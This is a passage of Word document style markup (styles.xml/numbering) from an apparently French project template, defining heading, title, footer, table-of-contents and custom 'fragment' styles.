    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="5"/>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fr-FR" w:eastAsia="fr-FR"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964"/>
    <w:link w:val="955"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="956"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="957"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="19">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="958"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="21">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="959"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="23">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="960"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="25">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="961"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="27">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="962"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="29">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="963"/>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954"/>
    <w:next w:val="954"/>
    <w:link w:val="34"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:contextualSpacing/>
      <w:spacing w:before="300" w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="34">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="33"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="35">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="36"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="36">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="35"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="37">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="38"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="38">
    <w:name w:val="Quote Char"/>
    <w:link w:val="37"/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="39">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>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964"/>
    <w:link w:val="981"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:styleId="44">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="976"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:styleId="46">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="1022"/>
    <w:link w:val="976"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="table" w:styleId="47">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="96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96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96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96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9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9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9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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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9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9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9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9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9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9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9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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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965"/>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965"/>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965"/>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965"/>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96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965"/>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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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96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9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9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9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9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9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9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9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96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96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96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96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96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96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96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96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96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96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96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96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96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96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954"/>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964"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="177">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="954"/>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964"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="189">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="190">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="954" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="955">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="967"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="300"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:color w:val="ff0000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="956">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="968"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="-68" w:right="266"/>
      <w:spacing w:after="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:color w:val="0000ff"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="957">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="969"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:right="85"/>
      <w:jc w:val="right"/>
      <w:spacing w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="008000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="958">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="970"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="959">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="971"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="960">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="972"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="961">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="973"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="962">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="974"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:i/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="963">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:link w:val="975"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="964" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:styleId="965" w:default="1">
    <w:name w:val="Normal Table"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:left w:w="108" w:type="dxa"/>
        <w:top w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="966" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:styleId="967" w:customStyle="1">
    <w:name w:val="Titre 1 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="955"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="968" w:customStyle="1">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="956"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="969" w:customStyle="1">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="957"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="970" w:customStyle="1">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="958"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="971" w:customStyle="1">
    <w:name w:val="Titre 5 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="959"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="972" w:customStyle="1">
    <w:name w:val="Titre 6 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="960"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="973" w:customStyle="1">
    <w:name w:val="Titre 7 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="961"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="974" w:customStyle="1">
    <w:name w:val="Titre 8 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="962"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="975" w:customStyle="1">
    <w:name w:val="Titre 9 Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="963"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="976">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="978"/>
    <w:link w:val="977"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536" w:leader="none"/>
        <w:tab w:val="right" w:pos="9072" w:leader="none"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="977" w:customStyle="1">
    <w:name w:val="Pied de page Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="976"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="978" w:customStyle="1">
    <w:name w:val="En-Tete"/>
    <w:basedOn w:val="954"/>
    <w:pPr>
      <w:ind w:left="68" w:right="-68"/>
      <w:jc w:val="center"/>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="979" w:customStyle="1">
    <w:name w:val="Titre-projet"/>
    <w:basedOn w:val="964"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="980" w:customStyle="1">
    <w:name w:val="N°Version"/>
    <w:basedOn w:val="964"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="981">
    <w:name w:val="Header"/>
    <w:basedOn w:val="954"/>
    <w:link w:val="982"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536" w:leader="none"/>
        <w:tab w:val="right" w:pos="9072" w:leader="none"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="982" w:customStyle="1">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="981"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="983" w:customStyle="1">
    <w:name w:val="Référence"/>
    <w:basedOn w:val="964"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="984" w:customStyle="1">
    <w:name w:val="Date-doc"/>
    <w:basedOn w:val="964"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="985">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="986">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="987">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="440"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="988">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="660"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="989" w:customStyle="1">
    <w:name w:val="Sommaire"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:pPr>
      <w:jc w:val="both"/>
      <w:pageBreakBefore/>
      <w:spacing w:after="360"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="-5670" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="990" w:customStyle="1">
    <w:name w:val="Titre de chapitre"/>
    <w:next w:val="991"/>
    <w:pPr>
      <w:spacing w:after="300"/>
      <w:widowControl w:val="off"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="4d4d4d"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="991" w:customStyle="1">
    <w:name w:val="Texte fragment"/>
    <w:link w:val="1048"/>
    <w:pPr>
      <w:ind w:left="57"/>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="992" w:customStyle="1">
    <w:name w:val="Sous-fragment"/>
    <w:next w:val="993"/>
    <w:link w:val="1046"/>
    <w:pPr>
      <w:ind w:right="57"/>
      <w:jc w:val="right"/>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="993" w:customStyle="1">
    <w:name w:val="Picto"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="994" w:customStyle="1">
    <w:name w:val="Module"/>
    <w:next w:val="991"/>
    <w:link w:val="1037"/>
    <w:pPr>
      <w:spacing w:after="300"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="995" w:customStyle="1">
    <w:name w:val="Fragment"/>
    <w:next w:val="993"/>
    <w:link w:val="1043"/>
    <w:pPr>
      <w:ind w:left="-69"/>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="996" w:customStyle="1">
    <w:name w:val="En-tête tableau"/>
    <w:basedOn w:val="954"/>
    <w:pPr>
      <w:ind w:left="57"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:widowControl w:val="off"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="997" w:customStyle="1">
    <w:name w:val="Etape"/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:spacing w:before="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="998" w:customStyle="1">
    <w:name w:val="Fragment suite"/>
    <w:basedOn w:val="995"/>
    <w:next w:val="993"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="999">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="220" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1000">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="440" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1001" w:customStyle="1">
    <w:name w:val="Index tableau"/>
    <w:basedOn w:val="954"/>
    <w:pPr>
      <w:ind w:right="113"/>
      <w:jc w:val="right"/>
